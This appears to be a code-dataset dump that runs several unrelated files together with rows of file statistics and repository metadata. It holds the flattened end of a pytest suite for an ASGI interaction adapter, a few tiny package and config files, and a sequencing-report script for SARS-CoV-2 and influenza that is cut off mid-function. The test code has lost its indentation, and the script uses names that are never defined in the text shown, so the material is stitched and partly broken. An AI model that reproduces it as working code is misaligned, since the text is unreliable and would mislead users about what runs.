http_scope["path"] = "/"
mock_receive = mock.AsyncMock()
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 404,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"Not found", "more_body": False}),
]
)
mock_receive.assert_not_called()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_not_base_route(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["method"] = "POST"
http_scope["path"] = "/not-base-route"
mock_receive = mock.AsyncMock()
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 404,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"Not found", "more_body": False}),
]
)
mock_receive.assert_not_called()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_no_body(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
mock_receive = mock.AsyncMock(return_value={"body": b"", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"POST request must have a body", "more_body": False}),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_no_body_and_receive_empty(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
mock_receive = mock.AsyncMock(return_value={})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"POST request must have a body", "more_body": False}),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_no_content_type(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = []
mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{"type": "http.response.body", "body": b"Content-Type must be application/json", "more_body": False}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_not_json_content_type(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [(b"Content-Type", b"NOT JSON")]
mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{"type": "http.response.body", "body": b"Content-Type must be application/json", "more_body": False}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_missing_timestamp_header(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [(b"Content-Type", b"application/json"), (b"x-signature-ed25519", b"676179")]
mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{
"type": "http.response.body",
"body": b"Missing required request signature header(s)",
"more_body": False,
}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_missing_ed25519_header(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [(b"Content-Type", b"application/json"), (b"x-signature-timestamp", b"87")]
mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{
"type": "http.response.body",
"body": b"Missing required request signature header(s)",
"more_body": False,
}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.parametrize("header_value", ["🇯🇵".encode(), b"trans"])
@pytest.mark.asyncio()
async def test_process_request_when_ed_25519_header_not_valid(
self,
adapter: yuyo.AsgiAdapter,
stub_server: hikari.api.InteractionServer,
http_scope: asgiref.typing.HTTPScope,
header_value: bytes,
):
http_scope["headers"] = [
(b"Content-Type", b"application/json"),
(b"x-signature-timestamp", b"87"),
(b"x-signature-ed25519", header_value),
]
mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{
"type": "http.response.body",
"body": b"Invalid ED25519 signature header found",
"more_body": False,
}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_on_interaction_raises(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [
(b"x-signature-timestamp", b"653245"),
(b"random-header2", b"random value"),
(b"x-signature-ed25519", b"7472616e73"),
(b"random-header", b"random value"),
(b"Content-Type", b"application/json"),
]
mock_receive = mock.AsyncMock(return_value={"body": b"transive", "more_body": False})
mock_send = mock.AsyncMock()
stub_error = Exception("💩")
stub_server.on_interaction.side_effect = stub_error
with pytest.raises(Exception, match=".*") as exc_info:
await adapter.process_request(http_scope, mock_receive, mock_send)
assert exc_info.value is stub_error
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 500,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call(
{
"type": "http.response.body",
"body": b"Internal Server Error",
"more_body": False,
}
),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_awaited_once_with(b"transive", b"trans", b"653245")
@pytest.mark.asyncio()
async def test_process_request_when_no_response_headers_or_body(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [
(b"Content-Type", b"application/json"),
(b"random-header2", b"random value"),
(b"x-signature-ed25519", b"6e796161"),
(b"x-signature-timestamp", b"321123"),
(b"random-header", b"random value"),
]
mock_receive = mock.AsyncMock(
side_effect=[{"body": b"cat", "more_body": True}, {"body": b"girls", "more_body": False}]
)
mock_send = mock.AsyncMock()
stub_server.on_interaction.return_value.payload = None
stub_server.on_interaction.return_value.headers = None
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": stub_server.on_interaction.return_value.status_code,
"headers": [],
}
),
mock.call(
{
"type": "http.response.body",
"body": b"",
"more_body": False,
}
),
]
)
mock_receive.assert_has_awaits([mock.call(), mock.call()])
stub_server.on_interaction.assert_awaited_once_with(bytearray(b"catgirls"), b"nyaa", b"321123")
| 41.608025 | 120 | 0.601847 | 2,936 | 26,962 | 5.249659 | 0.104905 | 0.049244 | 0.046714 | 0.04905 | 0.828327 | 0.809057 | 0.79699 | 0.783559 | 0.76695 | 0.756764 | 0 | 0.009144 | 0.290186 | 26,962 | 647 | 121 | 41.672334 | 0.79606 | 0.057859 | 0 | 0.629907 | 0 | 0 | 0.13043 | 0.011864 | 0 | 0 | 0 | 0 | 0.138318 | 1 | 0.007477 | false | 0 | 0.011215 | 0.005607 | 0.029907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dc2384083034870e5d823b519d483351a2bcd2e4 | 44 | py | Python | src/crud/__init__.py | week-with-me/fastapi-mongodb | c1b319a5f93a4a5c9c7800506fd7a1313de38ac1 | [
"MIT"
] | 1 | 2021-12-21T15:01:28.000Z | 2021-12-21T15:01:28.000Z | src/crud/__init__.py | week-with-me/fastapi-mongodb | c1b319a5f93a4a5c9c7800506fd7a1313de38ac1 | [
"MIT"
] | null | null | null | src/crud/__init__.py | week-with-me/fastapi-mongodb | c1b319a5f93a4a5c9c7800506fd7a1313de38ac1 | [
"MIT"
] | null | null | null | from src.crud.question import question_crud
| 22 | 43 | 0.863636 | 7 | 44 | 5.285714 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dc326d5ab81e1ad62905db56ece7bcbdb676c9b2 | 22 | py | Python | text/color/tone/tones.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/color/tone/tones.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/color/tone/tones.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | """
*Tones*
"""
| 3.666667 | 11 | 0.227273 | 1 | 22 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.409091 | 22 | 5 | 12 | 4.4 | 0.384615 | 0.318182 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dc59b198d06c9331333ee6b2e7d23f49ee80bf03 | 25 | py | Python | thepeer/__init__.py | sirrobot01/thepeer-python | 6a56d757ef68b7ca900c082d50cd84a9bfd0503d | [
"MIT"
] | 1 | 2022-01-27T11:53:56.000Z | 2022-01-27T11:53:56.000Z | thepeer/__init__.py | sirrobot01/thepeer-python | 6a56d757ef68b7ca900c082d50cd84a9bfd0503d | [
"MIT"
] | null | null | null | thepeer/__init__.py | sirrobot01/thepeer-python | 6a56d757ef68b7ca900c082d50cd84a9bfd0503d | [
"MIT"
] | null | null | null | from peer import ThePeer
| 12.5 | 24 | 0.84 | 4 | 25 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dc7e3f3355af6a2f928132e80ecbe81c79353c1e | 588 | py | Python | RecoBTag/CSVscikit/python/csvscikit_cff.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | RecoBTag/CSVscikit/python/csvscikit_cff.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | RecoBTag/CSVscikit/python/csvscikit_cff.py | flodamas/cmssw | fff9de2a54e62debab81057f8d6f8c82c2fd3dd6 | [
"Apache-2.0"
] | null | null | null | #csvsckit tagger
from RecoBTag.CSVscikit.csvscikit_EventSetup_cff import *
from RecoBTag.CSVscikit.pfInclusiveSecondaryVertexFinderCvsLTagInfos_cfi import *
from RecoBTag.CSVscikit.pfInclusiveSecondaryVertexFinderNegativeCvsLTagInfos_cfi import *
from RecoBTag.CSVscikit.pfCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.pfNegativeCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.pfPositiveCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.csvscikitTagJetTags_cfi import * #EDProducer
| 45.230769 | 91 | 0.901361 | 46 | 588 | 11.347826 | 0.347826 | 0.16092 | 0.281609 | 0.310345 | 0.287356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059524 | 588 | 12 | 92 | 49 | 0.943942 | 0.042517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dca735deeb09de66db007526147099416ac05e3f | 35,753 | py | Python | script/old/gen_techval-0.0.3.py | genepii/seqmet | 89fdab79131c861d4a5aae364ecdbeb3a9e0ae23 | [
"MIT"
] | null | null | null | script/old/gen_techval-0.0.3.py | genepii/seqmet | 89fdab79131c861d4a5aae364ecdbeb3a9e0ae23 | [
"MIT"
] | null | null | null | script/old/gen_techval-0.0.3.py | genepii/seqmet | 89fdab79131c861d4a5aae364ecdbeb3a9e0ae23 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import sys
import argparse
import numpy as np
import pandas as pd
def path_asfileslist(path):
if os.path.isdir(path):
files_list = []
for (dirpath, dirnames, filenames) in os.walk(path):
files_list.extend(filenames)
return files_list
else:
raise argparse.ArgumentTypeError(f'readable_dir:{path} is not a valid path')
def string_asfileslist(string):
files_list = []
for path in string.split(','):
if os.path.isdir(path):
files_list.append(path)
else:
raise argparse.ArgumentTypeError(f'readable_dir:{path} is not a valid path')
return files_list
def table_aslist(table, separator):
table_list = []
table_temp = [ x.split(separator) for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n') ]
for i in range(len(table_temp[0])):
table_list.append([])
for i in range(len(table_temp)):
for j in range(len(table_temp[i])):
table_list[j].append(table_temp[i][j])
return table_list
def table_asdf(table, separator):
table_temp = [ [ y.strip('"') for y in x.split(separator)[1:] ] for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[1:] ]
row_names = [ x.split(separator)[0] for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[1:] ]
column_names = open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[0].split(separator)[1:]
table_df = pd.DataFrame(table_temp, columns = column_names, index=row_names)
return table_df
def filter_table(table, filter_list):
outtable_index = []
outtable = []
for i in range(len(table[0])):
if any(f for f in filter_list if f in table[0][i]):
outtable_index.append(i)
for i in range(len(table)):
outtable.append([])
for i in range(len(table)):
for j in range(len(outtable_index)):
outtable[i].append(table[i][outtable_index[j]])
return outtable
def filter_dfrownames(df, filter_list, mode):
subsample_index = []
for i in range(len(list(df.index))):
if len([ x for x in filter_list if x in df.index[i]]) > 0:
subsample_index.append(list(df.index)[i])
if mode == 'keep':
return df.filter(items = subsample_index, axis=0)
elif mode == 'drop':
return df.drop(list(df.filter(items = subsample_index, axis=0).index.values))
def seek_dp(value, separator, threshold):
value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
if len(value_list) == 0:
return "NA"
elif max(value_list) >= threshold:
return "DP"
else:
return "NO"
def seek_varcount(value, separator, threshold):
#value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
if np.isnan(value):
return "NA"
elif int(value) >= threshold:
return "VARCOUNT" + str(int(value))
else:
return "NO"
def gen_metrics(value, separator, threshold):
value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
if len(value_list) == 0:
return "NA"
elif max(value_list) >= threshold:
return "VARCOUNT>=" + str(threshold)
else:
return "NO"
def validate_column_ncov(value, criteria, separator, threshold):
criteria_list = [ float(x) for x in criteria.split(separator) if x != 'NA' ]
if value in ['', 'nan'] and min(criteria_list) > threshold:
return "ABSCLADE"
elif len(criteria_list) == 0:
return "ININT"
elif min(criteria_list) < threshold:
return "ININT"
else:
return value
def validate_column_fluabv(value, criteria1, criteria2, separator, threshold, qc):
criteria1_list = [ float(x) for x in criteria1.split(separator) if x != 'NA' ]
criteria2_list = [ float(x) for x in criteria2.split(separator) if x != 'NA' ]
if qc not in ['good', 'mediocre']:
return "ININT"
elif value in ['', 'nan'] and min(criteria1_list) > threshold and min(criteria2_list) > threshold:
return "ABSCLADE"
elif len(criteria1_list) == 0 or len(criteria2_list) == 0:
return "ININT"
elif min(criteria1_list) < threshold or min(criteria2_list) < threshold:
return "ININT"
else:
return value
def list_position(value, valuesep, rangesep):
if value == '' or value == 'nan':
poslist = []
else:
poslist = []
rangelist = [ x for x in value.split(rangesep) ]
for x in rangelist:
poslist.append(range(int(x.split(valuesep)[0]),int(x.split(valuesep)[-1])+1))
poslist = [pos for plist in poslist for pos in plist]
return poslist
def list_intersect(containedl, containingl, mode, threshold):
foundpos = [ str(x) for x in containedl if x in containingl ]
if mode == 'match':
return ';'.join(foundpos)
elif mode == 'missing':
return ';'.join([ x for x in containedl if x not in containingl ])
nbcontained = len(containingl)-len(foundpos)
perccontained = nbcontained/len(containingl)
if mode == 'include':
criteria = perccontained
elif mode == 'exclude':
criteria = 100-perccontained
if criteria < threshold:
return "NO"
else:
return "YES"
def match_submatrix_ncov(lineage, clade, header, mode):
if len([ x for x in header[4:] if len(x.split('_'))!= 3 ]) > 0:
sys.exit("submatrix seems to be malformed : " + ';'.join([ x for x in header[4:] if len(x.split('_'))!= 3 ]))
header_clade = [ x.split('_')[0] for x in header]
header_comment_temp = [ x.split('_')[1] if len(x.split('_'))== 3 else 'NA' for x in header]
header_comment = [ x if x!='' else 'Lignage non surveille par Sante Publique France' for x in header_comment_temp]
header_lineage = [ x.split('_')[-1] for x in header]
if lineage in header_lineage:
if mode == 'match':
return lineage
if mode == 'index':
return header_lineage.index(lineage)
if mode == 'comment':
return header_comment[header_lineage.index(lineage)]
elif '.'.join(lineage.split('.')[0:-1]) in header_lineage and '.'.join(lineage.split('.')[0:-1]) not in ['','A','B','C']:
if mode == 'match':
return '.'.join(lineage.split('.')[0:-1])
if mode == 'index':
return header_lineage.index('.'.join(lineage.split('.')[0:-1]))
if mode == 'comment':
return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-1]))]
elif '.'.join(lineage.split('.')[0:-2]) in header_lineage and '.'.join(lineage.split('.')[0:-2]) not in ['','A','B','C']:
if mode == 'match':
return '.'.join(lineage.split('.')[0:-2])
if mode == 'index':
return header_lineage.index('.'.join(lineage.split('.')[0:-2]))
if mode == 'comment':
return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-2]))]
elif '.'.join(lineage.split('.')[0:-3]) in header_lineage and '.'.join(lineage.split('.')[0:-3]) not in ['','A','B','C']:
if mode == 'match':
return '.'.join(lineage.split('.')[0:-3])
if mode == 'index':
return header_lineage.index('.'.join(lineage.split('.')[0:-3]))
if mode == 'comment':
return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-3]))]
elif clade in header_clade:
if mode == 'match':
return clade
if mode == 'index':
return header_clade.index(clade)
if mode == 'comment':
return header_comment[header_clade.index(clade)]
else:
if mode == 'match':
return 'NA'
if mode == 'index':
return header_clade.index('ININT')
if mode == 'comment':
return ''
def match_submatrix_fluabv(lineage, clade, header, mode):
if len([ x for x in header[4:] if len(x.split('_'))!= 3 ]) > 0:
sys.exit("submatrix seems to be malformed : " + ';'.join([ x for x in header[4:] if len(x.split('_'))!= 3 ]))
header_clade = [ x.split('_')[0] for x in header]
header_comment_temp = [ x.split('_')[1] if len(x.split('_'))== 3 else 'NA' for x in header]
header_comment = [ x if x!='' else '' for x in header_comment_temp]
if clade in header_clade:
if mode == 'match':
return clade
if mode == 'index':
return header_clade.index(clade)
if mode == 'comment':
return header_comment[header_clade.index(clade)]
elif '/'.join(clade.split('/')[0:-1]) in header_clade:
if mode == 'match':
return '/'.join(clade.split('/')[0:-1])
if mode == 'index':
return header_clade.index('/'.join(clade.split('/')[0:-1]))
if mode == 'comment':
return header_comment[header_clade.index('/'.join(clade.split('/')[0:-1]))]
else:
if mode == 'match':
return 'NA'
if mode == 'index':
return header_clade.index('ININT')
if mode == 'comment':
return ''
def seek_expectedprofile_ncov(poslist, aasub):
expectedprofile = []
for i in range(1,len(poslist)):
if aasub[i] != '':
expectedprofile.append('S:' + poslist[i] + aasub[i])
return expectedprofile
def seek_expectedprofile_fluabv(poslist, aasub):
expectedprofile = []
for i in range(1,len(poslist)):
if aasub[i] != '':
expectedprofile.append(poslist[i] + aasub[i])
return expectedprofile
def seek_nocovsub_ncov(poslist, missingpos):
expectedpos_nucl = [ [(int(''.join(filter(str.isdigit, x))))*3-2+21562,(int(''.join(filter(str.isdigit, x))))*3-1+21562,(int(''.join(filter(str.isdigit, x))))*3+21562] for x in poslist[1:] ]
expectedpos = [ x for x in poslist[1:] ]
nocovsub = []
for i in range(len(expectedpos)):
if expectedpos_nucl[i][0] in missingpos or expectedpos_nucl[i][1] in missingpos or expectedpos_nucl[i][2] in missingpos:
nocovsub.append(expectedpos[i])
return nocovsub
def seek_nocovsub_fluabv(poslist, missingpos):
expectedpos_nucl = [ [(int(''.join(filter(str.isdigit, x))))*3-2+21562,(int(''.join(filter(str.isdigit, x))))*3-1+21562,(int(''.join(filter(str.isdigit, x))))*3+21562] for x in poslist[1:] ]
expectedpos = [ x for x in poslist[1:] ]
nocovsub = []
for i in range(len(expectedpos)):
if expectedpos_nucl[i][0] in missingpos or expectedpos_nucl[i][1] in missingpos or expectedpos_nucl[i][2] in missingpos:
nocovsub.append(expectedpos[i])
return nocovsub
def seek_insertion_ncov(insstring):
inslist = [ x for x in insstring.split(',') if x not in ['', 'nan'] ]
insertions = []
for i in range(0, len(inslist)):
if inslist[i] == '22204:GAGCCAGAA':
insertions.append('S:ins214EPE')
elif int(inslist[i].split(':')[0]) in list_nucrbd:
insertions.append('S:ins' + inslist[i].split(':')[0] + inslist[i].split(':')[1])
insertions.append('S:insAVISBIO')
return ','.join(insertions)
def seek_insertion_fluabv(insstring):
inslist = [ x for x in insstring.split(',') if x not in ['', 'nan'] ]
insertions = []
for i in range(0, len(inslist)):
insertions.append('Ins' + inslist[i].split(':')[0] + ':' + inslist[i].split(':')[1])
insertions.append('S:insAVISBIO')
return ','.join(insertions)
def validate_result_ncov(nextclade, dp, varcount, hasposc, val_nocovsub, val_missingsub):
result = ''
nocovsubpos = [ int(x[1:]) for x in val_nocovsub ]
if nextclade == 'ININT':
if hasposc == 'FAILED':
return 'REPASSE CI FAILED'
else:
return 'ININT'
else:
result = nextclade
if (dp != 'NO' and dp != 'NA') or (varcount != 'NO' and varcount != 'NA'):
result += '_REPASSE'
if dp != 'NO' and dp != 'NA':
result += '_' + dp
if varcount != 'NO' and varcount != 'NA':
result += '_' + varcount
if [ x for x in val_missingsub.split(';') if x.lstrip('S:')[:-1] not in [''] ] != []:
result += '_AVIS BIO'
elif len(list_intersect(nocovsubpos, list_aarbm, 'match', 100)) > 0:
result += '_AVIS BIO'
result += ' ' + args.nextcladeversion
return result
def validate_result_fluabv(nextclade, dp, varcount, hasposc, val_nocovsub, val_missingsub):
result = ''
nocovsubpos = [ int(x[1:]) for x in val_nocovsub ]
if nextclade == 'ININT':
if hasposc == 'FAILED':
return 'REPASSE CI FAILED'
else:
return 'ININT'
else:
result = datatype + ' - Clade ' + nextclade
if (dp != 'NO' and dp != 'NA') or (varcount != 'NO' and varcount != 'NA'):
result += '_REPASSE'
if dp != 'NO' and dp != 'NA':
result += '_' + dp
if varcount != 'NO' and varcount != 'NA':
result += '_' + varcount
result += ' ' + args.nextcladeversion
return result
def gen_commentary_ncov(classmatch, substitutions, deletions, insertions, nocovsub, comment, atypicsub, atypicindel):
if classmatch == 'ININT':
return 'DSC'
commentary = 'Profil de la spike : '
commentary += ';'.join(substitutions)
if len(deletions) > 0:
commentary += '|' + ';'.join(deletions)
if len(insertions) > 0:
commentary += '|' + ';'.join(insertions)
if nocovsub != []:
nocovsubpos = [ int(x[1:]) for x in nocovsub ]
if len(list_intersect(nocovsubpos, list_aarbm, 'match', 100)) > 0:
commentary += " ~ Rendu sous reserve compte tenu de(s) position(s) d'interet suivante(s) non couvertes sur la spike : " + ';'.join(nocovsub)
else:
commentary += " ~ Position(s) d'interet suivante(s) non couvertes sur la spike : " + ';'.join(nocovsub)
commentary += " ~ " + comment + " (" + submatrix_version[4:] + "." + submatrix_version[2:4] + "." + submatrix_version[0:2] + ")"
if (atypicsub != [''] or atypicindel != ['']) and classmatch not in list_submatrix_header_clade:
commentary += " ~ Profil atypique :"
if atypicsub != ['']:
commentary += " substitution(s) " + ";".join(atypicsub) + " presente(s) sur le RBD"
if atypicsub != [''] and atypicindel != ['']:
commentary += " -"
if atypicindel != ['']:
commentary += " indel(s) " + ";".join(atypicindel) + " present(s)"
elif classmatch not in list_submatrix_header_clade:
commentary += " ~ Profil typique du RBD"
commentary += '.'
return commentary
def gen_commentary_fluabv(classmatch, substitutions, deletions, insertions, nocovsub, comment, atypicsub, atypicindel):
if classmatch == 'ININT':
return 'DSC'
commentary = "Profil des positions d'interet de S4 : "
commentary += ';'.join(substitutions)
if len(deletions) > 0:
commentary += '|' + ';'.join(deletions)
if len(insertions) > 0:
commentary += '|' + ';'.join(insertions)
if nocovsub != []:
nocovsubpos = [ int(x[1:]) for x in nocovsub ]
commentary += " ~ Position(s) d'interet suivante(s) non couvertes sur HA : " + ';'.join(nocovsub)
if comment != '':
commentary += " ~ " + comment + " (" + submatrix_version[4:] + "." + submatrix_version[2:4] + "." + submatrix_version[0:2] + ")"
if (atypicsub != [''] or atypicindel != ['']) and classmatch not in list_submatrix_header_clade:
commentary += " ~ Profil atypique :"
if atypicsub != ['']:
commentary += " substitution(s) " + ";".join(atypicsub) + " presente(s) sur HA"
if atypicsub != [''] and atypicindel != ['']:
commentary += " -"
if atypicindel != ['']:
commentary += " indel(s) " + ";".join(atypicindel) + " present(s)"
elif classmatch not in list_submatrix_header_clade:
commentary += " ~ Profil typique"
commentary += '.'
return commentary
parser = argparse.ArgumentParser(description='Generate a validation report from seqmet files')
debugmode = parser.add_mutually_exclusive_group()
debugmode.add_argument('-v', '--verbose', action='store_true')
debugmode.add_argument('-q', '--quiet', action='store_true')
parser.add_argument('--version', action='version', version='0.0.3')
parser.add_argument('-r', '--rundate', help='rundate prefix')
depthdata = parser.add_mutually_exclusive_group()
depthdata.add_argument('-d', '--depthfiledir', help='the base', type=path_asfileslist)
depthdata.add_argument('-l', '--depthfilelist', help='the base', type=string_asfileslist)
parser.add_argument('-s', '--summary', help='the base')
parser.add_argument('-n', '--nextclade', help='the base')
parser.add_argument('-p', '--pangolin', help='the base')
parser.add_argument('-x', '--nextcladeversion', help='the base')
parser.add_argument('-t', '--vartable', help='the base')
parser.add_argument('-m', '--submatrix', help='the base')
parser.add_argument('--mode', help='the base')
parser.add_argument('--varcount_threshold', type=int, default=13, help='the base')
parser.add_argument('--dp_threshold', type=int, default=6, help='the base')
parser.add_argument('--cov_minok', type=int, default=90, help='the base')
parser.add_argument('--cov_maxneg', type=int, default=5, help='the base')
parser.add_argument('--error_plate', default='', help='the base')
parser.add_argument('-o', '--outdir', help='output files to specified dir', default='./')
if __name__ == '__main__':
args = parser.parse_args()
if args.mode == 'ncov':
run_date = args.rundate
datatype = args.submatrix.split('_')[1]
submatrix_version = args.submatrix.split('-')[-1].split('.')[0]
df_var = table_asdf(args.vartable, '\t')
df_var = df_var.apply(pd.to_numeric, errors='coerce').fillna(df_var)
